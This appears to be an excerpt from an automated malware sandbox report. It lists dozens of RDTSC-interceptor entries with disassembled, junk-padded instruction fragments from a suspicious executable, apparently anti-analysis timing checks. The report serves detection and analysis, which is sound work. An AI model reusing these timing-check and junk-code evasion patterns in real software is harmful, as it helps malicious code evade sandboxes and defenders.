              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE25DB second address: FE25E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE2A59 second address: FE2A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE2D0F second address: FE2D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE2D13 second address: FE2D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE2FF1 second address: FE2FF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F91DF4 second address: F91E04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jo 00007F646C53F7B0h 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE2002 second address: FE2014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F646CD1477Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE2014 second address: FE204D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F646C53F7A6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F646C53F7ADh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F646C53F7B8h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE204D second address: FE2053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE2053 second address: FE2057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE2057 second address: FE207D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F646CD14776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F646CD14785h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE5257 second address: FE5261 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F646C53F7A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB5A39 second address: FB5A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB5A3F second address: FB5A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ecx, dword ptr [ebp+122D1E9Bh] 0x0000000f lea eax, dword ptr [ebp+124817A3h] 0x00000015 or dword ptr [ebp+122D2864h], ebx 0x0000001b mov dword ptr [ebp+122D37DAh], edx 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F646C53F7ACh 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB5A6F second address: F912A0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F646CD14778h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jmp 00007F646CD14782h 0x00000012 pop edx 0x00000013 pop edx 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F646CD14778h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D3474h], eax 0x00000035 movsx edi, bx 0x00000038 mov edx, dword ptr [ebp+122D39A5h] 0x0000003e call dword ptr [ebp+122D2036h] 0x00000044 jc 00007F646CD14798h 0x0000004a jng 00007F646CD14782h 0x00000050 ja 00007F646CD14776h 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB5B35 second address: FB5B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB5B3B second address: FB5B3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB608D second address: FB6093 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB6313 second address: FB632D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F646CD14785h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB632D second address: FB6352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007F646C53F7ACh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F646C53F7ADh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB63DE second address: FB63EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F646CD1477Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB6568 second address: FB65B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov ecx, 47637D2Bh 0x0000000d push 00000004h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F646C53F7A8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 ja 00007F646C53F7A9h 0x0000002f movsx ecx, dx 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 ja 00007F646C53F7A6h 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB65B3 second address: FB65B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB65B7 second address: FB65BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB65BD second address: FB65D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F646CD14778h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB6953 second address: FB6957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB6957 second address: FB695D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB695D second address: FB6A00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F646C53F7A8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 ja 00007F646C53F7ABh 0x0000002b or edi, dword ptr [ebp+122D365Eh] 0x00000031 push 0000001Eh 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007F646C53F7A8h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d jne 00007F646C53F7D7h 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 jmp 00007F646C53F7AAh 0x0000005c pop eax 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB6A00 second address: FB6A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F646CD14776h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB6D03 second address: FB6D4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b jmp 00007F646C53F7B5h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007F646C53F7B3h 0x0000001c jmp 00007F646C53F7ADh 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB6D4D second address: FB6D73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007F646CD14776h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 pushad 0x00000011 pushad 0x00000012 jmp 00007F646CD1477Eh 0x00000017 push eax 0x00000018 pop eax 0x00000019 popad 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB6E0E second address: F91DF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F646C53F7B7h 0x0000000f jmp 00007F646C53F7B1h 0x00000014 popad 0x00000015 mov dword ptr [esp], eax 0x00000018 lea eax, dword ptr [ebp+124817E7h] 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F646C53F7A8h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 add edx, dword ptr [ebp+122D31C9h] 0x0000003e push eax 0x0000003f jng 00007F646C53F7B4h 0x00000045 mov dword ptr [esp], eax 0x00000048 call 00007F646C53F7ACh 0x0000004d jo 00007F646C53F7ACh 0x00000053 or edi, 627B1402h 0x00000059 pop edx 0x0000005a lea eax, dword ptr [ebp+124817A3h] 0x00000060 cld 0x00000061 push eax 0x00000062 jng 00007F646C53F7AEh 0x00000068 jbe 00007F646C53F7A8h 0x0000006e pushad 0x0000006f popad 0x00000070 mov dword ptr [esp], eax 0x00000073 cld 0x00000074 or dword ptr [ebp+122D28A3h], esi 0x0000007a call dword ptr [ebp+122D20DBh] 0x00000080 push edi 0x00000081 push ecx 0x00000082 push edi 0x00000083 pop edi 0x00000084 pop ecx 0x00000085 push eax 0x00000086 push edx 0x00000087 jp 00007F646C53F7A6h 0x0000008d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE93C1 second address: FE93C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE93C5 second address: FE93D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F646C53F7A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FED8C8 second address: FED8CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FED8CC second address: FED8E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FED8E4 second address: FED8EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FF5250 second address: FF5254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FF54AC second address: FF54B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F646CD14776h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FF57AD second address: FF57C5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F646C53F7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jbe 00007F646C53F7A6h 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FF57C5 second address: FF57E4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F646CD1477Dh 0x0000000d jmp 00007F646CD1477Ah 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FF5910 second address: FF5914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FF4F9B second address: FF4FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F646CD14776h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FF5D18 second address: FF5D1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FF5D1C second address: FF5D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F646CD14776h 0x0000000d jmp 00007F646CD1477Ah 0x00000012 popad 0x00000013 jne 00007F646CD14778h 0x00000019 push eax 0x0000001a pop eax 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push edi 0x0000001f pop edi 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 popad 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jc 00007F646CD14776h 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FF8453 second address: FF8459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FF8459 second address: FF845F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FF845F second address: FF8471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jl 00007F646C53F7A6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FFB070 second address: FFB07A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F646CD14776h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FFB07A second address: FFB0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F646C53F7BAh 0x0000000c jno 00007F646C53F7BDh 0x00000012 popad 0x00000013 push ebx 0x00000014 pushad 0x00000015 jp 00007F646C53F7A6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FFB240 second address: FFB25E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F646CD14787h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FFB25E second address: FFB269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FFB269 second address: FFB26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1001D53 second address: 1001D81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F646C53F7ACh 0x00000012 jnp 00007F646C53F7B5h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 100061A second address: 100061E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 100061E second address: 1000626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1000799 second address: 10007BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD14788h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 100092E second address: 1000932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1000932 second address: 1000982 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD14782h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jl 00007F646CD14776h 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 popad 0x00000016 pushad 0x00000017 jnl 00007F646CD14778h 0x0000001d jmp 00007F646CD1477Bh 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007F646CD14781h 0x0000002a pop edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1000982 second address: 1000986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1000C29 second address: 1000C83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD14789h 0x00000007 jmp 00007F646CD14783h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F646CD1477Eh 0x00000013 jmp 00007F646CD14780h 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jp 00007F646CD14776h 0x00000022 push ecx 0x00000023 pop ecx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1000C83 second address: 1000C87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB6754 second address: FB67D7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F646CD1477Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b add cl, FFFFFFB1h 0x0000000e mov ebx, dword ptr [ebp+124817E2h] 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F646CD14778h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D33C8h] 0x00000034 add eax, ebx 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007F646CD14778h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 00000017h 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 nop 0x00000051 jnl 00007F646CD14784h 0x00000057 push eax 0x00000058 push edi 0x00000059 push eax 0x0000005a push edx 0x0000005b ja 00007F646CD14776h 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1001A70 second address: 1001A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 100464C second address: 100465C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 100465C second address: 1004666 instructions: 0x00000000 rdtsc 0x00000002 js 00007F646C53F7AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1004666 second address: 1004679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1004679 second address: 100467F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1004968 second address: 100498C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F646CD14776h 0x00000009 jmp 00007F646CD14782h 0x0000000e pop esi 0x0000000f jc 00007F646CD14782h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 100498C second address: 1004992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1008ACE second address: 1008AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 ja 00007F646CD1477Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1008AE6 second address: 1008AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1008AEE second address: 1008AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1007D3A second address: 1007D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1008631 second address: 1008646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD14781h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1008646 second address: 100864A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 100864A second address: 1008650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10116A8 second address: 10116AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10116AC second address: 10116E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F646CD14787h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 jnp 00007F646CD14776h 0x00000019 popad 0x0000001a jne 00007F646CD1477Eh 0x00000020 rdtsc
